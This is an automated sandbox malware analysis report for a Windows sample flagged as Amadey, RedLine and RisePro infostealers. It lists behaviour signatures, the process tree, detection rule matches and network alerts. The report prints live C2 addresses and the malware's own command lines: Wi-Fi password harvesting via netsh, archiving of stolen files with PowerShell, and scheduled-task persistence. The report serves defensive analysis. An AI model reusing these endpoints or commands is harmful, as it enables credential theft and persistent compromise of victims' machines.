Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
Analysis ID:1428500
MD5:f854143c49c4d2fa4cf73bab97ba8d3a
SHA1:62454e89cf9b2558347e2179f49fb4a56f4762ec
SHA256:8c8afd00e6087780e4ee0a36f170ba06f13ba6d0c46cd2119b876e88d40c24e3
Tags:Amadeyexe
Infos:

Detection

Amadey, RedLine, RisePro Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected RedLine Stealer
Yara detected RisePro Stealer
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Connects to many ports of the same IP (likely port scanning)
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: Suspicious Add Scheduled Task Parent
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe (PID: 6128 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe" MD5: F854143C49C4D2FA4CF73BAB97BA8D3A)
    • explorha.exe (PID: 1788 cmdline: "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" MD5: F854143C49C4D2FA4CF73BAB97BA8D3A)
  • explorha.exe (PID: 2428 cmdline: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe MD5: F854143C49C4D2FA4CF73BAB97BA8D3A)
  • explorha.exe (PID: 4484 cmdline: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe MD5: F854143C49C4D2FA4CF73BAB97BA8D3A)
    • rundll32.exe (PID: 5168 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 3356 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 5228 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • conhost.exe (PID: 5516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3176 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 1164 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
    • amert.exe (PID: 1988 cmdline: "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe" MD5: 339020815B65530333BF2DDC928AC867)
    • 831840b410.exe (PID: 3364 cmdline: "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe" MD5: FB666C3917F960FD67DF0C2C8829D77F)
      • chrome.exe (PID: 412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 2956 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 3092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5644 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 7292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 8152 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • c884f8452a.exe (PID: 5596 cmdline: "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe" MD5: 52257E8159B53FFB0F4E7CAE516DC107)
      • schtasks.exe (PID: 6420 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 2324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3636 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 2232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 8032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 2132 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • explorha.exe (PID: 5732 cmdline: "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" MD5: F854143C49C4D2FA4CF73BAB97BA8D3A)
  • chrosha.exe (PID: 6044 cmdline: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe MD5: 339020815B65530333BF2DDC928AC867)
  • svchost.exe (PID: 5144 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • MPGPH131.exe (PID: 4012 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 52257E8159B53FFB0F4E7CAE516DC107)
    • WerFault.exe (PID: 7472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 2052 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • MPGPH131.exe (PID: 3436 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 52257E8159B53FFB0F4E7CAE516DC107)
    • WerFault.exe (PID: 720 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 1948 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • 831840b410.exe (PID: 5672 cmdline: "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe" MD5: FB666C3917F960FD67DF0C2C8829D77F)
    • chrome.exe (PID: 2764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1636,i,5624198576768077496,445941079671464976,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • c884f8452a.exe (PID: 7988 cmdline: "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe" MD5: 52257E8159B53FFB0F4E7CAE516DC107)
  • RageMP131.exe (PID: 1864 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 52257E8159B53FFB0F4E7CAE516DC107)
  • 831840b410.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe" MD5: FB666C3917F960FD67DF0C2C8829D77F)
    • chrome.exe (PID: 8004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 2124 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1984,i,457568203381776828,11237095852378400144,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrosha.exe (PID: 8024 cmdline: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe MD5: 339020815B65530333BF2DDC928AC867)
    • build12.exe (PID: 5608 cmdline: "C:\Users\user\AppData\Local\Temp\1000187001\build12.exe" MD5: 4CFD179519524269052023E10DE6B866)
      • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7996 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 3844 cmdline: MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 7396 cmdline: MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • build12.exe (PID: 7324 cmdline: MD5: 4CFD179519524269052023E10DE6B866)
      • conhost.exe (PID: 7292 cmdline: MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • c884f8452a.exe (PID: 7476 cmdline: "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe" MD5: 52257E8159B53FFB0F4E7CAE516DC107)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Amadey

{"C2 url": ["http://193.233.132.56/Pneh2sXQk0/index.php"]}

Threatname: RedLine

{"C2 url": ["b-stamps.gl.at.ply.gg:30946"], "Bot Id": "Traffic"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      dump.pcapWindows_Trojan_RedLineStealer_f54632ebunknownunknown
      • 0x18138a5:$a4: get_ScannedWallets
      • 0x1812599:$a5: get_ScanTelegram
      • 0x1813529:$a6: get_ScanGeckoBrowsersPaths
      • 0x1810e4d:$a7: <Processes>k__BackingField
      • 0x180e629:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
      • 0x181065d:$a9: <ScanFTP>k__BackingField

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          C:\Users\user\AppData\Local\Temp\1000187001\build12.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            C:\Users\user\AppData\Local\Temp\1000187001\build12.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWindows_Trojan_RedLineStealer_f54632ebunknownunknown
              • 0x135ca:$a4: get_ScannedWallets
              • 0x12428:$a5: get_ScanTelegram
              • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
              • 0x1106a:$a7: <Processes>k__BackingField
              • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
              • 0x1099e:$a9: <ScanFTP>k__BackingField
              Click to see the 21 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
                    00000000.00000003.2052123987.0000000004FE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      0000001D.00000002.3261208378.0000000007DEF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
                        Click to see the 42 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        52.0.build12.exe.3c0000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                          52.0.build12.exe.3c0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                            52.0.build12.exe.3c0000.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                            • 0x135ca:$a4: get_ScannedWallets
                            • 0x12428:$a5: get_ScanTelegram
                            • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                            • 0x1106a:$a7: <Processes>k__BackingField
                            • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                            • 0x1099e:$a9: <ScanFTP>k__BackingField
                            52.0.build12.exe.3c0000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                            • 0x1048a:$u7: RunPE
                            • 0x13b41:$u8: DownloadAndEx
                            • 0x9130:$pat14: , CommandLine:
                            • 0x13079:$v2_1: ListOfProcesses
                            • 0x1068b:$v2_2: get_ScanVPN
                            • 0x1072e:$v2_2: get_ScanFTP
                            • 0x1141e:$v2_2: get_ScanDiscord
                            • 0x1240c:$v2_2: get_ScanSteam
                            • 0x12428:$v2_2: get_ScanTelegram
                            • 0x124ce:$v2_2: get_ScanScreen
                            • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                            • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                            • 0x13509:$v2_2: get_ScanBrowsers
                            • 0x135ca:$v2_2: get_ScannedWallets
                            • 0x135f0:$v2_2: get_ScanWallets
                            • 0x13610:$v2_3: GetArguments
                            • 0x11cd9:$v2_4: VerifyUpdate
                            • 0x1660a:$v2_4: VerifyUpdate
                            • 0x139ca:$v2_5: VerifyScanRequest
                            • 0x130c6:$v2_6: GetUpdates
                            • 0x165eb:$v2_6: GetUpdates
                            15.2.chrosha.exe.70000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                              Click to see the 4 entries

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: New RUN Key Pointing to Suspicious Folder
                              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe, ProcessId: 4484, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\831840b410.exe
                              Sigma detected: Suspicious Script Execution From Temp Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 3356, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 3176, ProcessName: powershell.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe, ProcessId: 4484, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\831840b410.exe
                              Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
                              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 3356, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 3176, ProcessName: powershell.exe
                              Sigma detected: Suspicious Add Scheduled Task Parent
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST, CommandLine: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe, ParentProcessId: 5596, ParentProcessName: c884f8452a.exe, ProcessCommandLine: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST, ProcessId: 6420, ProcessName: schtasks.exe
                              Sigma detected: Non Interactive PowerShell Process Spawned
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 3356, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 3176, ProcessName: powershell.exe
                              Sigma detected: Windows Processes Suspicious Parent Directory
                              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5144, ProcessName: svchost.exe

                              Stealing of Sensitive Information

                              barindex
                              Sigma detected: Capture Wi-Fi password
                              Source: Process startedAuthor: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 3356, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 5228, ProcessName: netsh.exe

                              Snort Signatures

                              Timestamp:04/19/24-03:29:11.518092
                              SID:2044696
                              Source Port:49719
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:07.505716
                              SID:2855239
                              Source Port:49717
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:30:04.436794
                              SID:2856122
                              Source Port:80
                              Destination Port:49869
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:25.875488
                              SID:2044696
                              Source Port:49768
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:36.618824
                              SID:2046269
                              Source Port:49774
                              Destination Port:58709
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:15.465561
                              SID:2044696
                              Source Port:49721
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:30:04.208351
                              SID:2046266
                              Source Port:58709
                              Destination Port:49870
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:21.206725
                              SID:2044696
                              Source Port:49741
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:31.281244
                              SID:2046269
                              Source Port:49762
                              Destination Port:58709
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:36.518747
                              SID:2046269
                              Source Port:49773
                              Destination Port:58709
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:30:06.348500
                              SID:2044696
                              Source Port:49880
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:30:07.998984
                              SID:2044696
                              Source Port:49886
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:23.961610
                              SID:2049060
                              Source Port:49762
                              Destination Port:58709
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:30:16.706571
                              SID:2046266
                              Source Port:58709
                              Destination Port:49918
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:08.315222
                              SID:2856151
                              Source Port:49718
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:47.530154
                              SID:2046266
                              Source Port:58709
                              Destination Port:49822
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:29:03.313673
                              SID:2856147
                              Source Port:49713
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:04/19/24-03:30:09.223113
                              SID:2855239
                              Source Port:49892
